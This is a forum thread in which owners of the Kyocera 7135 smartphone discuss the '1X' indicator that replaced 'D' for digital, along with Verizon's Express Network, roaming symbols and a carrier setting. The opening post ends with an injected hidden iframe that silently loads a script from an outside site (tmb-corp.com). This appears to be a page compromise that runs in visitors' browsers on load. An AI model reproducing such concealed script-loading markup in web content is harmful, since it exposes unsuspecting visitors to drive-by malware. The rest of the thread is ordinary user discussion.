+ Reply to Thread
Page 1 of 2 1 2 LastLast

7135 Display

In phone mode does the 7135 display a D when in a Digital area? Across the top left mine has 1X, signal strength and GPS symbol. The owners manual says there should be a D for Digital.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: 7135 Display

Originally posted by slorandy
    In phone mode does the 7135 display a D when in a Digital area? Across the top left mine has 1X, signal strength and GPS symbol. The owners manual says there should be a D for Digital.
    The verizon phones have changed this. 1x is digital and also can access Verizons high speed data network.
    The "old" get connected 7135's only show the D.
    If at first you don't succeed, don't try sky diving.

Re: 7135 Display

Originally posted by slorandy
    In phone mode does the 7135 display a D when in a Digital area? Across the top left mine has 1X, signal strength and GPS symbol. The owners manual says there should be a D for Digital.
    As Steve B. said, the 1X is supposed to signify that you are in an Express Network coverage area.

What I'm curious about is if anyone has yet observed what happens if you are not in an EN coverage area. Does it change to a "D"? (assuming you are in a digital coverage area).
    Please visit my picture site: Robert-O-Rama :)

Re: Re: 7135 Display

Originally posted by Robert K.
    As Steve B. said, the 1X is supposed to signify that you are in an Express Network coverage area.

What I'm curious about is if anyone has yet observed what happens if you are not in an EN coverage area. Does it change to a "D"? (assuming you are in a digital coverage area).
    I took a trip to Iowa last weekend, the whole time on a major highway, I expected to see the "1X" change to a R but it never did. I have AC so I could have been in a digital area the whole time but was wierd was I got that funny triangle on both the phone display as well as the external lcd ... anybody figure out what that for yet?
    iPhone therefore iAm.

Yes they did. The triangle is for roaming indicator.

Display question

I hope this isnt too dumb of a question. On my new 7135, on the display in the upper left corner I see the symbol "1X". The manual says this is where it should display an R, D or A depending on the Signal (Roam, Digital or Analog). Does anyone else get this 1X? Any idea what it means?

Thanks

Express Network?

My guess is that this would indicate you are in an area that has 1XRTT (high speed data) network service - did you sign up for Verizon's Expresss Network?

it means that you are in their digital area and able to get a regular (non EN) data connection. the 1x is normal per Verizon.
    The one who dies with the most toys WINS :-)

"1X" in Phone Display

A friend of mine just purchased a 7135 and the phone arrived this week. We've been comparing his phone to mine and he seems to have somewhat unreliable phone connections (ie loosing the connection on calls where the connection is strong and unbroken when the same call is made from my 7135).

One thing we noticed that is different in the phone display is where my display shows "D" for digital signal, his shows "1X". At first I thought the "1X" might mean that his phone was provisioned for Express Network, but he didn't purchase Express Network and data connections from his phone only seem to work when configured for a 14.4 connection. I was suspicious about this but, in calls to Verizon, they indicated the Verizon phones show this "1X" instead of the "D". I haven't seen any messages indicating this change, so I figured it would be worthwhile to ask about it here. Are all phones currently being released by Verizon showing "1X" instead of "D" in the phone display?
    Dave

We had a discussion about the "1X" a couple days ago here...

So... your 7135 appears to be the more stable of the two so far?
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.
    We had a discussion about the "1X" a couple days ago here...

http://www.smartphonesource.com/vbul...ighlight=1x%2A

So... your 7135 appears to be the more stable of the two so far?
    Thanks Robert! Somehow I had missed that entire dicussion.

Yes to your question. Leon does seem to be experiencing poor phone connections when the signal strength is high. He has discussed this with Verizon and the tentative explanation is a defective phone, but he hasn't returned it yet.
    Dave

If I have Express Network activated, does that mean every connection to internet is at the higher speed - even when I use PQAs?

Digital Indicator

My digital/analog indicator shows a 1X instead of the "D". What is wrong?:BigKnife:

Nothing is wrong. As I understand it, the newer firmware shows 1X instead of D when you are in an area that has Express Network availability.

I thought 1X meant 1xRTT (CDMA)

Doesn't 1X really mean 1XRTT or CDMA. I think there's a difference between CDMA (which is digital) and TDMA (which is digital too) and/or analog. For what it's worth, I'm running a 7135 on US Cellular's network and see the 1X. When I travel outside of covered areas, roaming kicks in and sometimes the 1X changes to D (for digital) and other times it changes to A (for analog) depending on which carrier it finds and that carrier's capabilities. Does this sound right? I hope so.

Administrator
    yes it means 1xrtt but you dont roam on TDMA since this phone is CDMA only.

you just have newer firmware so you are ok! :UpThum

Traveling

I just spent a week on the road between NM and TX, got the 1x until Albaquerque NM then went to Analog (A) and EXtended Network on the banner. Coming back, got a (D) on the east side of Albaquerque until I got into the city and then (1X). I don't think this phone "likes" changing networks, time zones and answering call will on the extended network. Had several soft resets 3 hard resets, and twice the phone would not work unless I took the battery out for several minutes.

Tom
    To most people, the sky is the limit.
    To those who love flight, the sky is home

Folks,

The "1X" display has nothing to do with newer firmware -- it is a setting that can be turned on or off with the Kyocera PST tool.

Alltel had this display option turned off since they didn't have any high speed. Even if you do not subscrbe to Express Network the newer Verizon phones (and those Alltel phones that have the setting changed) will show this.

Glenn

Glenn--

I kinda like the 1X, how do I change my Alltel phone to display this?

Is the cost of 1X use under a Verizon EN plan covered when you are in an "extended network" area?

As an example, I have Verizon AC plan (no EN yet) and was travelling in Wisc where I was in a 1X area of US Cellular (7135 phone screen said "1X-Extended Network" ). I am curious if you had Verizon's EN plan, could use the 1X service and have no additional charges beyond Verizon's EN plan cost.
    RayB